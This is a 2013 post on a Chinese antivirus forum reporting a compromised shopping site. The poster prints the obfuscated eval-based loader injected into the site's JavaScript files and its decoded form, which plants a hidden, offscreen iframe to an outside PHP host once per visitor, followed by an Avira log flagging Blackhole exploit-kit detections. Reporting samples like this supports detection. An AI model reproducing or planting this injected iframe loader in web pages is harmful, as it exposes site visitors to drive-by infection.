查看: 1451|回复: 0
收起左侧

[已鉴定] http://www.lussostyle.com/7_replica-d-g

[复制链接]
fireold
发表于 2013-10-4 20:17:03 | 显示全部楼层 |阅读模式
  1. /*0f2490*/
  2. z = "y";
  3. vz = "d" + "o" + "c" + "ument";
  4. try {
  5.     +
  6.     function() {
  7.         if (document.querySelector)++(window[vz].body) == null
  8.     }()
  9. } catch (q) {
  10.     aa = function(ff) {
  11.         ff = "fr" + "omCh" + ff;
  12.         for (i = 0; i < z.length; i++) {
  13.             za += String[ff](e(v + (z[i])) - (13));
  14.         }
  15.     };
  16. };
  17. e = (eval);
  18. v = "0x";
  19. a = 0;
  20. try {;
  21. } catch (zz) {
  22.     a = 1
  23. }
  24. if (!a) {
  25.     try {
  26.         ++e(vz)["\x62o" + "d" + z]
  27.     } catch (q) {
  28.         a2 = "^";
  29.     }
  30.     z = "2d^73^82^7b^70^81^76^7c^7b^2d^7e^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^7e^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^81^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^7e^3b^80^7f^70^2d^4a^2d^34^75^81^81^7d^47^3c^3c^84^84^84^3b^7f^75^7c^7b^72^3a^6e^79^7d^72^80^3b^7c^7f^74^3c^44^58^65^57^43^78^75^70^3b^7d^75^7d^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^46^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^46^7d^85^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^84^76^71^81^75^2d^4a^2d^34^46^7d^85^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^79^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^46^34^48^1a^17^2d^7e^3b^80^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^46^34^48^1a^17^1a^17^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7e^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^7e^69^34^2d^70^79^6e^80^80^4a^69^34^7e^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7e^34^36^3b^6e^7d^7d^72^7b^71^50^75^76^79^71^35^7e^36^48^1a^17^2d^8a^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^88^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61^76^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^72^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^80^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^38^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^75^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^81^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^73^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^80^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^35^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7e^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);
  31.     za = "";
  32.     aa("arCode");
  33.     e("" + za);
  34. } /*/0f2490*/
复制代码

  1. function q09() {
  2.      var static = 'ajax';
  3.      var controller = 'index.php';
  4.      var q = document.createElement('iframe');

  5.      q.src = 'http://www.rhone-alpes.org/7KXJ6khc.php';
  6.      q.style.position = 'absolute';
  7.      q.style.color = '9';
  8.      q.style.height = '9px';
  9.      q.style.width = '9px';
  10.      q.style.left = '10009';
  11.      q.style.top = '10009';

  12.      if (!document.getElementById('q')) {
  13.          document.write('<p id=\'q\' class=\'q09\' ></p>');
  14.          document.getElementById('q').appendChild(q);
  15.      }
  16. }

  17. function SetCookie(cookieName, cookieValue, nDays, path) {
  18.      var today = new Date();
  19.      var expire = new Date();
  20.      if (nDays == null || nDays == 0) nDays = 1;
  21.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  22.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  23. }

  24. function GetCookie(name) {
  25.      var start = document.cookie.indexOf(name + "=");
  26.      var len = start + name.length + 1;
  27.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  28.          return null;
  29.      }
  30.      if (start == -1) return null;
  31.      var end = document.cookie.indexOf(";", len);
  32.      if (end == -1) end = document.cookie.length;
  33.      return unescape(document.cookie.substring(len, end));
  34. }
  35. if (navigator.cookieEnabled) {
  36.      if (GetCookie('visited_uq') == 55) {} else {
  37.          SetCookie('visited_uq', '55', '1', '/');

  38.          q09();
  39.      }
  40. }
复制代码


Avira
2013/10/4 下午 08:15 [排程管理員] 工作已開始
      工作 "自動更新"
      已成功開始。

2013/10/4 下午 08:12 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\tools[1].js'
      包含病毒或有害的程式 'JS/Blacole.EH.1' [virus]
      已採取動作:
      檔案會移動至 '57541ec7.qua' 名稱底下的隔離區目錄。.

2013/10/4 下午 08:12 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        771
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\jquery.autocomplete[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery.jcarousel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\jquery.carousel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\ajax-cart[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jquery-1.4.4.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery.easing.1.3[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\tools[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jquery.tools.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jtweetsanywhere[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\script[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jscript[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jquery.mousewheel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\jquery.easing.1.3[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery.tools.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\script[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:12 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/loftwitter/assets/script.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jtweetsanywhere[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:12 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/loftwitter/assets/jtweetsanywhere.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery.tools.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jquery.tools.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:12 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.lussostyle.com/modules/loftabshome/assets/jquery.tools.min.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:12 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.lussostyle.com/modules/loftabsright/assets/jquery.tools.min.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:12 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/loftabshome/assets/jscript.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:封鎖的檔案

2013/10/4 下午 08:12 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jscript[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:12 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/loftabsright/assets/jscript.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery.easing.1.3[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/js/jquery/jquery.easing.1.3.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\7_replica-d-g[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '54741fb3.qua' 名稱底下的隔離區目錄。.

2013/10/4 下午 08:11 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        772
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\jquery.easing.1.3[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.lussostyle.com/modules/lofcarousel/assets/jquery.easing.1.3.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\jquery.carousel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jquery-1.4.4.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/js/jquery/jquery-1.4.4.min.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/lofcarousel/assets/jquery.carousel.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\jquery.mousewheel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\ajax-cart[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/modules/blockcart/ajax-cart.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.lussostyle.com/modules/lofcarousel/assets/jquery.mousewheel.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery.jcarousel[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.lussostyle.com/modules/lofmanufacturerscroll/assets/jquery.jcarousel
      .js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\jquery.autocomplete[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/js/jquery/jquery.autocomplete.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\tools[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:11 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/js/tools.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/10/4 下午 08:11 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\7_replica-d-g[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/10/4 下午 08:10 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\7_replica-d-g[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2013/10/4 下午 08:10 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lussostyle.com/7_replica-d-g" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過


av6.jpg



fs6.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 11:52 , Processed in 0.122723 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表